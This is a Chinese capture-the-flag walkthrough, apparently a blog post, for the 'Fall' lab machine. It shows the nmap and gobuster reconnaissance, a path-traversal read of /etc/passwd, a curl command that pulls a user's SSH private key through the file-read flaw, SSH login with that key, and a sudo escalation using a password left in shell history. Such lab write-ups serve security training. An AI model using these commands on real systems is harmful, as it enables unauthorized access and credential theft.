fall靶机攻略

1、扫描靶机地址

nmap c段

2、访问IP

3、爆破目录

gobuster dir -u http://192.168.19.164 -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt

扫到这么多,依次看一下响应码是200的目录,最终在robots.txt看到了

暂时还不知道这是什么信息,但是先有个印象,然后我在text.php看到了

告诉我们缺少get参数,说明这里是get传参的,我们尝试一下有没有文件读取漏洞

?file=../../../../../../etc/passwd

说明这里是存在任意文件读取漏洞的,我们看一下里面的信息,发现了用户qiu

去查看他的秘钥

用:curl http://192.168.19.164/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa导出秘钥,再用cat查看:cat id_rsa

为秘钥文件提权

chmod 600 id_rsa

可以看到已经提权了,接着利用秘钥登录这个qiu用户

ssh qiu@192.168.19.164 -i id_rsa

进来之后先查看一下有什么文件

然后去看看这些文件都有什么信息

在历史记录文件发现这个用户输出了remarkablyawesomE并上传了,然后就执行了ifconfig,那可能这个就是密码,用户登上去之后就查看IP,我们尝试一下

输入sudo -l ,把密码输入进去

确实可以,而且权限是和root一个级别的,那么我们切换到root用户,查看文件

sudo su切换到root用户,cat ~/remarks.txt查看flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值